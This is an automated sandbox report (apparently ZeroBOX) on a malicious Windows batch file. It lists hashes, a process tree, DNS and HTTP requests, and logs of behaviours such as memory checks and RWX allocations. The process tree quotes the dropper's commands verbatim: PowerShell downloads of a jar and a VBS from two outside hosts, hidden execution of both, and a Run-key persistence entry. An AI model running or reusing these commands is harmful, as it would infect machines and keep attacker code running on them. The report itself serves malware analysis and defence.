Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 14, 2023, 10:12 a.m.	Dec. 14, 2023, 10:14 a.m.

Size	1.7KB
Type	DOS batch file, ASCII text, with CRLF line terminators
MD5	`5409f23480db5358d2cc2417f2c41494`
SHA256	`48d6f5e343c4fbe7726f8bad43cfb817d419281c1cc932b4d04bbbe805c5c8f8`
CRC32	`46DBE089`
ssdeep	`24:w8oIhtxnsFDIztRPP0vb+bY3fuvl/vORKQNb/jx5bRqjTuTYJw+x8hEHNySsRDHc:FRxsotybz8ex+/G+FNnsR7OSeX8ElX`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "DynvLyTnpYAMA" C:\Users\test22\AppData\Local\Temp\POA35BT56TT.bat
524
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\POA35BT56TT.bat
  1952
  - powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://eusketxe.com/s/putty.jar', 'C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar')"
    2136
  - powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://brahmacouncil.com/fs/fs/run_hidden.vbs', 'C:\Users\test22\AppData\Local\Temp\PuttyDownload\run_hidden.vbs')"
    2316
  - cscript.exe cscript //nologo ""C:\Users\test22\AppData\Local\Temp\PuttyDownload\run_hidden.vbs""
    2432
    - cmd.exe "C:\Windows\System32\cmd.exe" /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
      2504
      - java.exe java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
        2564
        
        cmd.exe cmd.exe /c "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp" /f"
        2724
        
        reg.exe REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp" /f
        2780

Name	Response	Post-Analysis Lookup
brahmacouncil.com	A 67.20.115.231	67.20.115.231
eusketxe.com	A 167.250.5.28	167.250.5.28

IP Address	Status	Action
154.127.53.176	Active	Moloch
164.124.101.2	Active	Moloch
167.250.5.28	Active	Moloch
67.20.115.231	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (14 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2023, 10:12 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 14, 2023, 10:12 a.m.			0	0
IsDebuggerPresent Dec. 14, 2023, 10:12 a.m.			0	0
IsDebuggerPresent Dec. 14, 2023, 10:12 a.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 14, 2023, 10:12 a.m.	buffer: Document is being downloaded. Please wait until the process is completed. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2023, 10:12 a.m.	buffer: Downloads completed. Files saved to C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar and C:\Users\test22\AppData\Local\Temp\PuttyDownload\run_hidden.vbs console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2023, 10:12 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f03e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006707e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006707e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006707e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670a68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006707e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006707e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006707e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006709a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00670ba8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046fde0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046fde0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046fde0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046f560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046f560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046f560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046f560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046f560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2023, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0046f560 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 14, 2023, 10:12 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Dec. 14, 2023, 10:12 a.m.	stacktrace: exception.instruction_r: 8b 06 8d b5 f8 00 00 00 c5 fe 7f 06 c5 fe 7f 7e exception.instruction: mov eax, dword ptr [esi] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x2680202 registers.esp: 12449016 registers.edi: 1 registers.eax: 6 registers.ebp: 1950012608 registers.edx: 0 registers.ebx: 16910336 registers.esi: 0 registers.ecx: 3405691582	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://eusketxe.com/s/putty.jar
suspicious_features	GET method with no useragent header				suspicious_request	GET http://brahmacouncil.com/fs/fs/run_hidden.vbs

Performs some HTTP requests (2 events)

request	GET http://eusketxe.com/s/putty.jar
request	GET http://brahmacouncil.com/fs/fs/run_hidden.vbs

Allocates read-write-execute memory (usually to unpack itself) (50 out of 306 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02450000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02800000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04921000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04922000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04923000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04924000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04925000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04926000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04927000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04928000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04929000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0492a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0492b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0492c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0492d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0492e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2023, 10:12 a.m.	process_identifier: 2136 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0492f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
